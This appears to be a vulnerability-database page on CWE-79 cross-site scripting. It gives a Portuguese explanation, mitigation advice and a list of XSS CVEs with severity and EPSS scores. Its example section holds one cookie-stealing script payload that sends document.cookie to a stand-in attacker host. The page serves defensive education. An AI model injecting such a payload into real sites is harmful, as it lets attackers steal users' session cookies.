Fallos del tipo CWE-79

28.619 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2021-38315MEDIUMSP Project & Document Manager <= 4.25 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-34635MEDIUMPoll Maker <= 3.2.8 - Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-38355MEDIUMBug Library <= 2.0.3 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-34642MEDIUMSmart Email Alerts <= 1.0.10 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-3427—The Deluge Web-UI is vulnerable to XSS through a crafted torrent file. The the data from torrent files is not properly sanitised as it's intEPSS 0.9%CVE-2021-38323MEDIUMRentPress <= 6.6.4 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2025-2709MEDIUMYonyou UFIDA ERP-NC login.jsp cross site scriptingEPSS 0.9%CVE-2021-38327MEDIUMYouTube Video Inserter <= 1.2.1.0 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2025-2710MEDIUMYonyou UFIDA ERP-NC menu.jsp cross site scriptingEPSS 0.9%CVE-2021-38325MEDIUMUser Activation Email <= 1.3.0 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-34644MEDIUMMultiplayer Games <= 3.7 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-38316MEDIUMWP Academic People List <= 0.4.1 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-38333MEDIUMWP Scrippets <= 1.5.1 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2023-36031HIGHMicrosoft Dynamics 365 (on-premises) Cross-site Scripting VulnerabilityEPSS 0.9%CVE-2023-36410HIGHMicrosoft Dynamics 365 (on-premises) Cross-site Scripting VulnerabilityEPSS 0.9%CVE-2021-38347MEDIUMCustom Website Data <= 2.2 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2025-2711MEDIUMYonyou UFIDA ERP-NC systop.jsp cross site scriptingEPSS 0.9%CVE-2021-34664MEDIUMMoova for WooCommerce <= 3.5 Reflected Cross-Site ScriptingEPSS 0.9%CVE-2019-10179MEDIUMA vulnerability was found in all pki-core 10.x.x versions, where the Key Recovery Authority (KRA) Agent Service did not properly sanitize reEPSS 0.9%CVE-2021-4124HIGHCross-site Scripting (XSS) - Stored in meetecho/janus-gatewayEPSS 0.9%